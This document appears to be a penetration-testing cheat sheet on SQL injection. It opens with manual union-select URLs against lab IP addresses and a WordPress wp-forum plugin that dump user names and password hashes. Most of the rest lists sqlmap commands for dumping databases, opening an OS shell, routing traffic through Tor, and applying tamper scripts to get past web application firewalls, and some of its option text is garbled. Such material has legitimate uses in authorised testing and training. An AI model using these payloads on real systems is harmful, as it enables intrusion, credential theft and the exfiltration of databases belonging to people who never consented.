SQL Injection
http://10.11.15.137/comment.php?id=756'
http://10.11.15.137/comment.php?id=756 order by 7
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,6,7
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,table_name,7 from information_schema.tables
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,column_name,7 from information_schema.columns where table_name='users'
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,concat(name,0x3a,password),7 FROM users
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 union all select 1
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users
If you don’t know anything about the target site then use the normal command first, Observe if the sqlmap found something juicy for you
sqlmap -u “https://target_site.com/page/”
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”
You can specify on which parameter you want to check or exploit the sql injection using just “-p” flag.
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2” -p p1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"
You can specify a request file containing the HTTP request, You can get it quickly from BurpSuite.
sqlmap -r request.txt
Here you can specify the targeted parameter or sqlmap will recognize and will test for all the parameters found.
Specify Custom Position in HTTP request file
You can use asterisk sign(*) to specify which parameter to attack or which place of the request to be attacked. You can specify or mark any part of the request by this method.
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password
If you got SQL injection positive somewhere, then sqlmap will automatically create a session file(.sqlite) for later use. Now, If you want to try some other commands later, you can use the session file directly (It will save your time to re-try all the possible payloads and identify the vulnerability and all.)
sqlmap -u “https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs
You can use this file from the home path of sqlmap tool’s output directory.
If the SQL injection vulnerability observed positive then you can use the following commands to Exploit the SQL injection vulnerability.
sqlmap -u “https://target_site.com/page?p1=value1” --dbs
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump
sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"
sqlmap -u “https://target_site.com/page?p1=value1” --os-shell
sqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell
sqlmap -u “https://target_site.com/page?p1=value1” --proxy="http://127.0.0.1:8080/"
sqlmap -u “https://target_site.com/page?p1=value1” --tor --tor-type=SOCKS5 --check-tor --dbs
sqlmap -u “https://target_site.com/page?p1=value1” --dbms=mysql
You can use other DBMS types like MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, etc.
–technique Specify a letter or letters of BEUSTQ to control the exploit attempts:
- B: Boolean-based blind
- E: Error-based
- U: Union query-based
- S: Stacked queries
- T: Time-based blind
- Q: Inline queries
sqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ
You can specify the difficulty levels using two flags,
- 1.–level = LEVEL Level of tests to perform (1-5, default 1)
- 2.–risk=RISK Risk of tests to perform (0-3, default 1)
sqlmap -u “https://target_site.com/page?p1=value1” --risk=3 --level=5
Option:
--risk
This option requires an argument that specifies the risk of tests to perform. There are three risk values.
–riks=1: 1 is default value which is for the majority of SQL injection points.
–riks=2: Adds to the default level the tests for heavy query time-based SQL injections
–riks=3: Value 3 adds also
OR
-based SQL injection tests.Option:
--
levelWhen the value of
--level
is >= 2 it tests also HTTP Cookie
header values. When this value is >= 3 it tests also HTTP User-Agent
and HTTP Referer
header value for SQL injections.Use –batch flag to use all the default options or used for non-interactive sessions. (By specifying –batch flag, sqlmap will not ask you for the (Y/N) choice rather then it will smartly choose according to the needs.)
sqlmap -u “https://target_site.com/page?p1=value1” --batch
Force SQLmap to use SSL or TLS for its requests.
Error: Can’t establish SSL connection
If you getting the following error during testing then you can use the flag –force-ssl to force SQLMap to use SSL or TLS.
You can use the tamper scripts to bypass WAF or to modify the payload. You can use multiple tampering scripts at once using –tamper flag.
sqlmap -u “https://target_site.com/page?p1=value1” --tamper=charencode
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dsash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
OR You can create your own Custom Tamper script to overcome the issue of some type of Encrypted payloads like AES, DES, Hashing, etc.

Last modified 11mo ago